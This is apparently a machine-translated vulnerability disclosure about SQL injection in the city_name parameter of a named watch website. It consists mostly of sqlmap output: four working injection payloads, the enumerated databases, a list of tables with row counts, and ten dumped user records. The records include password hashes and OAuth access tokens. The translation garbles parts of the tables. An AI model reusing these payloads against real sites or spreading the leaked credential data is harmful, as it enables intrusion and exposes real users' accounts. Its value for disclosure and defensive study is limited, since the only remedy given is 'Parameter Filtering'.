User data leakage caused by SQL injection of watch house
User data leakage caused by SQL injection of watch house
Http://s.xbiao.com/list? City_name = % E5 % 8C % 97% E4 % BA % AC & brand_id = 6 (GET)
Web application technology: Apache, PHP 5.3.27
Back-end DBMS: MySQL 5.0
Sqlmap identified the following injection points with a total of 0 HTTP (s) requests:
---
Place: GET
Parameter: city_name
Type: boolean-based blind
Title: OR boolean-based blind-WHERE or HAVING clause (MySQL comment)
Payload: city_name =-6053 'OR (8797 = 8797) # & brand_id = 6
Type: error-based
Title: MySQL >=5.0 AND error-based-WHERE or HAVING clause
Payload: city_name = % E5 % 8C % 97% E4 % BA % AC' AND (SELECT 6331 FROM (select count (*), CONCAT (0x7175776471, (SELECT (case when (6331 = 6331) THEN 1 ELSE 0 END), 0x716a766a71, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x)) AND 'pipp' = 'pipp & brand_id = 6
Type: stacked queries
Title: MySQL> 5.0.11 stacked queries
Payload: city_name = % E5 % 8C % 97% E4 % BA % AC'; select sleep (5) -- & brand_id = 6
Type: AND/OR time-based blind
Title: MySQL> 5.0.11 AND time-based blind
Payload: city_name = % E5 % 8C % 97% E4 % BA % AC' and sleep (5) AND 'iewu' = 'iewu & brand_id = 6
---
Web application technology: Apache, PHP 5.3.27
Back-end DBMS: MySQL 5.0
Available databases [3]:
[*] Information_schema
[*] Test
[*] Watch
Web application technology: Apache, PHP 5.3.27
Back-end DBMS: MySQL 5.0
Database: watch
+ ---------------------------------- + --------- +
| Table | Entries |
+ ---------------------------------- + --------- +
| Watch_bdsearch_ranking | 3065885 |
| Watch_consumer_count | 1, 2200741 |
| Apache_log | 1392751 |
| Watch_count_month | 1018802 |
| Watch_link_flag | 1, 987799 |
| Watch_product_param_function | 981470 |
| Watch_link_caught | 930492 |
| Watch_visit_ip_log | 1, 789364 |
| Watch_users | 638259 |
| Watch_product_param_appearance | 1, 576341 |
| Watch_product_param_clock | 498352 |
| Watch_count | 477396 |
| Watch_search_keywords_log | 442206 |
| Watch_apple_user | 293294 |
| Watch_iphone_count_month | 252435 |
| Watch_app_devices | 226571 |
| Watch_user_online | 196244 |
| Watch_product_param_normal | 141603 |
| Watch_data_caught | 127616 |
| Watch_wbiao_compare | 124239 |
| Tmp_pic_local | 119017 |
| Tmp_image | 117645 |
| Watch_image_info | 104032 |
| Wcms_content_log | 100154 |
| Watch_ald_contents | 89656 |
| Watch_product_value | 70768 |
| Watch_product | 38421 |
| Watch_product_info | 38230 |
| Watch_search_keywords | 37678 |
| Watch_news_relation | 34444 |
| Watch_catch | 33399 |
| Tao_products_copy | 30312
| CMS _ base | 30089 |
| Cms_content | 30086 |
| Watch_brand_rank | 27340 |
| Wcms_content_count | 25160 |
| Cms_content_bak | 25030 |
| Watch_blackwords | 24427 |
| Watch_user_cookies | 1, 24102 |
| Watch_kms | 23441 |
| Watch_brands | catch | 21522 |
| Cms_image | 20709 |
| Watch_product_comment | 19779 |
| Watch_movement_param_val | 19044 |
| Watch_link_log | 16906 |
| Watch_aladdin | 15698 |
| Watch_correction_data | 13031 |
| Tao_union_gods | 12862 |
| Watch_iwatch365_threaded | 11918 |
| Watch_favorite_article| 11905 |
| Watch_store_brands | 11224 |
| Watch_consumer_process | 1, 10980 |
| Watch_favorite_brand| 10729 |
| Maid | 10280 |
| Watch_consumer | 9034 |
| Watch_consumer_intention | 9034 |
| Watch_sms_captcha | 8965 |
| Watch_store | 7140 |
| Watch_sms_log | 6244 |
| Watch_signature | 5911 |
| Watch_link | 5381 |
| Watch_job | 5322 |
| Wf_img | 4243 |
| Watch_vote | 4005 |
| Watch_index_pos | 3976 |
| Maid | 3822 |
| Wf_img_temp | 3678 |
| Wcms_content_position | 3546 |
| Wf_img_tag | 3521 |
| Watch_little_series | 3141 |
| Zuoye_relation | 3079 |
| Add_log | 2944 |
| Wcms_zuoye | 2738 |
| Watch_data_dict | 2096 |
| Watch_cms_pinjian | 2044 |
| Tao_comments | 1942 |
| Tao_products | 1838 |
| Watch_cat_book_detail | 1825 |
| Watch_advise | 1817 |
| Watch_cat_new_product| 1369 |
| Watch_bbs_recommend| 1367 |
| Watch_movment | 1319 |
| Watch_series | 1254 |
| Watch_authenuser | 964 |
| Watch_syslog | 921 |
| Watch_index_recommend| 754 |
| Watch_bbs_recommend_delete | 600 |
| Watch_manual_positions | 465 |
| Watch_shoot_product| 431 |
| Watch_authorid | 425 |
| Watch_hot_keywords | 396 |
| Watch_catch_logs | 376 |
| Watch_wbiao_brand | 337 |
| Watch_city | 334 |
| Watch_brand_store | 304 |
| Watch_loves_product| 289 |
| Watch_0000ke | 269 |
| Watch_store_picture | 1, 259 |
| Wcms_cat_relation | 1, 238 |
| Watch_brand_compare | 226 |
| Watch_piaget2014 | 224 |
| Watch_cat_image_book| 218 |
| Tao_union_brands | 217 |
| Watch_admin _log | 217 |
| Watch_power | 211 |
| Zhuanti_common | 199 |
| Watch_basel_vote | 182 |
| Maid | 174 |
| Watch_movement_img| 174 |
| Watch_loves_product_price | 169 |
| Maid | 157 |
| Watch_hot_keywords_log | 113 |
| Watch_stop_product | 113 |
| Wf_tag | 107 |
| Watch_brand | 93 |
| Watch_zhuanti_comments | 93 |
| Watch_admin_user | 88 |
| Watch_store_correction | 86 |
| Watch_hk_log | 80 |
| Watch_hg_log | 75 |
| Watch_param | 73 |
| Watch_param_search | 73 |
| Watch_brand_forum_relation | 72 |
| Watch_zhuanti | 66 |
| Watch_hk_consumer_intention | 64 |
| Watch_medal_relation | 60 |
| Watch_movement_correction | 56 |
| Wcms_author | 55 |
| Watch_file_cache | 52 |
| Watch_movement_manufacturer | 49 |
| Watch_iwatch365_forum | 48 |
| Watch_events | 42 |
| Watch_hg_goods | 41 |
| Watch_hk_consumer | 41 |
| Watch_temp_shoot | 37 |
| Watch_holidays | 35 |
| Watch_province | 34 |
| Watch_geneva_vote | 27 |
| Watch_template | 27 |
| Watch_brand_seo_log | 25 |
| Watch_hg_info | 22 |
| Wcms_copyfrom | 22 |
| Watch_hk_discount | 17 |
| Watch_kms_param | 14 |
| Watch_country | 12 |
| Watch_software | 12 |
| Tao_favor | 11 |
| Tao_users | 10 |
| Watch_consumer_note | 10 |
| Watch_admin_message | 7 |
| Watch_medal_grade | 7 |
| Watch_admin_group | 6 |
| Watch_param_type | 6 |
| Wcms_position | 5 |
| Watch_company | 4 |
| Wcms_category | 4 |
| Watch_mobile_version | 3 |
| Wcms_params | 3 |
| Tao_union_log | 1 |
| Watch_groups | 1 |
| Watch_interview | 1 |
| Watch_search_keywords_suggestion | 1 |
+ ---------------------------------- + --------- +
[10 entries]
+ ---- + ------- + ---------- + Hour + --------- + hour + -------- + ------------- + --------- + hour + ------------ + ---------- + hour + ---------- + ----------- + ------------ + hour +
| Id | uc_id | group_id | oauth_id | salt | email | status | reg_ip | userpic | password | reg_time | activkey | username | nickname | lastvisit | from_site | updatetime | access_token |
+ ---- + ------- + ---------- + Hour + --------- + hour + -------- + ------------- + --------- + hour + ------------ + ---------- + hour + ---------- + ----------- + ------------ + hour +
| 1 | 4 | 1 | | | [Email protected] | 1 | 10.19.8.20.| 1 | 7dc07811ca96226cbeea2b399a8e9861 | 1311781201 | | [Email protected] | burt | 0 | | NULL |
| 2 | 5 | 1 | | | [Email protected] | 1 | 10.19.8.20.| 1 | 7dc07811ca96226cbeea2b399a8e9861 | 1311781749 | | [Email protected] | burt2007 | 0 | | NULL |
| 3 | 6 | 1 | | | [Email protected] | 1 | 10.19.8.20.| 1 | 7dc07811ca96226cbeea2b399a8e9861 | 1311783154 | | [Email protected] | test007 | 0 | | NULL |
| 4 | 7 | 1 | | | [Email protected] | 1 | 10.19.8.20.| 1 | 7dc07811ca96226cbeea2b399a8e9861 | 1311783604 | | [Email protected] | test008 | 0 | | NULL |
| 28 | 21 | 1 | 1762535055 | | [Email protected] | 1 | 10.19.8.120 | 1 | 41a3ede344ace22c9d05994cd87b31c3| 1311843645 | | Light blue watch | 0 | sina | NULL | 2.00ls6rvb0uo58n37cdcda00exmz1gd |
| 29 | 22 | 1 | 659559ECDE2AB0212B28AEC37ED2B333 _ | | [Email protected] | 1 | 10.19.8.120 | 1 | 41a3ede344ace22c9d05994cd87b31c3| 1311843712 | | Deep blue melancholy | 0 | qq | NULL | FE0489A65632DBBC9937F6CF273D844C |
| 30 | 23 | 1 | F3C621376F20B38E398DADA71D73C395 | | [Email protected] | 1 | 10.19.8.120 | 1 | 41a3ede344ace22c9d05994cd87b31c3| 1311847422 | | Light blue cc watch | 0 | qq | NULL | FE0489A65632DBBC466C3D9BD7F20CFE |
| 31 | 24 | 1 | | | [Email protected] | 1 | 10.19.8.20.| 1 | 4a1d4d8a936688a0afcc07fecdbc05ad | 1311849615 | | Zookeeper Wang | 0 | xbiao.com | NULL |
| 32 | 25 | 1 | | | [Email protected] | 1 | 10.19.8.20.| 1 | 4a1d4d8a936688a0afcc07fecdbc05ad | 1311849615 | | 9813944 | 9813944 | 0 | xbiao.com | NULL |
| 33 | 26 | 1 | | | [Email protected] | 1 | 10.19.8.20.| 1 | 4a1d4d8a936688a0afcc07fecdbc05ad | 1311849615 | | $ Kung Fu tea $ | 0 | xbiao.com | NULL |
+ ---- + ------- + ---------- + Hour + --------- + hour + -------- + ------------- + --------- + hour + ------------ + ---------- + hour + ---------- + ----------- + ------------ + hour +
Solution:
Parameter Filtering